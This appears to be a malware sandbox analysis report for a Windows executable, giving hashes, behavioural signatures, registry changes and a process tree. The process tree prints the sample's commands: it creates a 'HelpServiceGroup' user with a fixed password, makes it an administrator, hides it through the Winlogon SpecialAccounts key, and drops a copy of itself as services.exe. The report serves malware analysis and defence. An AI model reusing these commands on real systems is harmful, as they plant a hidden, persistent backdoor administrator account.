Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
96s -
max time network
178s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
19/09/2022, 11:34
Static task
static1
Behavioral task
behavioral1
Sample
791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe
Resource
win10v2004-20220812-en
General
-
Target
791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe
-
Size
196KB
-
MD5
9a9bc53a852924cc6a0b2773f4924515
-
SHA1
99f6ed6b5d066fc675262054d379db6d1e92d84d
-
SHA256
791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f
-
SHA512
1d161a1d4f4ad9430a65e5bdb89846b9154366a4aecffffc354e18904de9af89e4577d2b71ce21dbe3238ee0c104325989aefec65cf915d76e4a0bd9f9432d19
-
SSDEEP
6144:CGHx7NOZxelAjG503Kx7+RMvC1QNXs4qAldlU6DyxD6QPB4d:lNOZclAjG503Kx7+RMvC1QZs4qAldlU6
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\SysWOW64\drivers\services.exe 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe File opened for modification C:\Windows\SysWOW64\drivers\services.exe 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe File created C:\Windows\SysWOW64\drivers\services.exe services.exe -
Executes dropped EXE 2 IoCs
pid Process 1784 services.exe 3136 services.exe -
Modifies WinLogon 2 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\HelpServiceGroup = "0" services.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\ 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\HelpServiceGroup = "0" 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\ services.exe -
Runs net.exe
-
Suspicious use of SetWindowsHookEx 9 IoCs
pid Process 4656 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe 4656 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe 4656 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe 1784 services.exe 1784 services.exe 1784 services.exe 3136 services.exe 3136 services.exe 3136 services.exe -
Suspicious use of WriteProcessMemory 51 IoCs
description pid Process procid_target PID 4656 wrote to memory of 4880 4656 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe 79 PID 4656 wrote to memory of 4880 4656 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe 79 PID 4656 wrote to memory of 4880 4656 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe 79 PID 4880 wrote to memory of 2000 4880 cmd.exe 81 PID 4880 wrote to memory of 2000 4880 cmd.exe 81 PID 4880 wrote to memory of 2000 4880 cmd.exe 81 PID 4656 wrote to memory of 1784 4656 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe 82 PID 4656 wrote to memory of 1784 4656 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe 82 PID 4656 wrote to memory of 1784 4656 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe 82 PID 2000 wrote to memory of 1392 2000 net.exe 83 PID 2000 wrote to memory of 1392 2000 net.exe 83 PID 2000 wrote to memory of 1392 2000 net.exe 83 PID 1784 wrote to memory of 4008 1784 services.exe 84 PID 1784 wrote to memory of 4008 1784 services.exe 84 PID 1784 wrote to memory of 4008 1784 services.exe 84 PID 1784 wrote to memory of 3136 1784 services.exe 86 PID 1784 wrote to memory of 3136 1784 services.exe 86 PID 1784 wrote to memory of 3136 1784 services.exe 86 PID 4008 wrote to memory of 3368 4008 cmd.exe 87 PID 4008 wrote to memory of 3368 4008 cmd.exe 87 PID 4008 wrote to memory of 3368 4008 cmd.exe 87 PID 3368 wrote to memory of 320 3368 net.exe 90 PID 3368 wrote to memory of 320 3368 net.exe 90 PID 3368 wrote to memory of 320 3368 net.exe 90 PID 3136 wrote to memory of 228 3136 services.exe 88 PID 3136 wrote to memory of 228 3136 services.exe 88 PID 3136 wrote to memory of 228 3136 services.exe 88 PID 228 wrote to memory of 4336 228 cmd.exe 91 PID 228 wrote to memory of 4336 228 cmd.exe 91 PID 228 wrote to memory of 4336 228 cmd.exe 91 PID 4336 wrote to memory of 1060 4336 net.exe 92 PID 4336 wrote to memory of 1060 4336 net.exe 92 PID 4336 wrote to memory of 1060 4336 net.exe 92 PID 4880 wrote to memory of 2636 4880 cmd.exe 93 PID 4880 wrote to memory of 2636 4880 cmd.exe 93 PID 4880 wrote to memory of 2636 4880 cmd.exe 93 PID 2636 wrote to memory of 1672 2636 net.exe 94 PID 2636 wrote to memory of 1672 2636 net.exe 94 PID 2636 wrote to memory of 1672 2636 net.exe 94 PID 4880 wrote to memory of 4680 4880 cmd.exe 95 PID 4880 wrote to memory of 4680 4880 cmd.exe 95 PID 4880 wrote to memory of 4680 4880 cmd.exe 95 PID 4680 wrote to memory of 4644 4680 net.exe 96 PID 4680 wrote to memory of 4644 4680 net.exe 96 PID 4680 wrote to memory of 4644 4680 net.exe 96 PID 4880 wrote to memory of 2920 4880 cmd.exe 97 PID 4880 wrote to memory of 2920 4880 cmd.exe 97 PID 4880 wrote to memory of 2920 4880 cmd.exe 97 PID 2920 wrote to memory of 804 2920 net.exe 98 PID 2920 wrote to memory of 804 2920 net.exe 98 PID 2920 wrote to memory of 804 2920 net.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe"C:\Users\Admin\AppData\Local\Temp\791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe"1⤵
- Drops file in Drivers directory
- Modifies WinLogon
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Windows\SysWOW64\cmd.execmd /c net user HelpServiceGroup hacker /add && net localgroup administrators HelpServiceGroup /add && net localgroup users HelpServiceGroup /delete && net user HelpServiceGroup /expires:never /passwordchg:no2⤵
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Windows\SysWOW64\net.exenet user HelpServiceGroup hacker /add3⤵
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user HelpServiceGroup hacker /add4⤵PID:1392
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup administrators HelpServiceGroup /add3⤵
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators HelpServiceGroup /add4⤵PID:1672
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup users HelpServiceGroup /delete3⤵
- Suspicious use of WriteProcessMemory
PID:4680 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup users HelpServiceGroup /delete4⤵PID:4644
-
-
-
C:\Windows\SysWOW64\net.exenet user HelpServiceGroup /expires:never /passwordchg:no3⤵
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user HelpServiceGroup /expires:never /passwordchg:no4⤵PID:804
-
-
-
-
C:\Windows\SysWOW64\drivers\services.exeC:\Windows\system32\drivers\services.exe2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Modifies WinLogon
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Windows\SysWOW64\cmd.execmd /c net user HelpServiceGroup hacker /add && net localgroup administrators HelpServiceGroup /add && net localgroup users HelpServiceGroup /delete && net user HelpServiceGroup /expires:never /passwordchg:no3⤵
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Windows\SysWOW64\net.exenet user HelpServiceGroup hacker /add4⤵
- Suspicious use of WriteProcessMemory
PID:3368 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user HelpServiceGroup hacker /add5⤵PID:320
-
-
-
-
C:\Windows\SysWOW64\drivers\services.exeC:\Windows\system32\drivers\services.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Windows\SysWOW64\cmd.execmd /c net user HelpServiceGroup hacker /add && net localgroup administrators HelpServiceGroup /add && net localgroup users HelpServiceGroup /delete && net user HelpServiceGroup /expires:never /passwordchg:no4⤵
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Windows\SysWOW64\net.exenet user HelpServiceGroup hacker /add5⤵
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user HelpServiceGroup hacker /add6⤵PID:1060
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
196KB
MD59a9bc53a852924cc6a0b2773f4924515
SHA199f6ed6b5d066fc675262054d379db6d1e92d84d
SHA256791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f
SHA5121d161a1d4f4ad9430a65e5bdb89846b9154366a4aecffffc354e18904de9af89e4577d2b71ce21dbe3238ee0c104325989aefec65cf915d76e4a0bd9f9432d19
-
Filesize
196KB
MD59a9bc53a852924cc6a0b2773f4924515
SHA199f6ed6b5d066fc675262054d379db6d1e92d84d
SHA256791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f
SHA5121d161a1d4f4ad9430a65e5bdb89846b9154366a4aecffffc354e18904de9af89e4577d2b71ce21dbe3238ee0c104325989aefec65cf915d76e4a0bd9f9432d19
-
Filesize
196KB
MD59a9bc53a852924cc6a0b2773f4924515
SHA199f6ed6b5d066fc675262054d379db6d1e92d84d
SHA256791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f
SHA5121d161a1d4f4ad9430a65e5bdb89846b9154366a4aecffffc354e18904de9af89e4577d2b71ce21dbe3238ee0c104325989aefec65cf915d76e4a0bd9f9432d19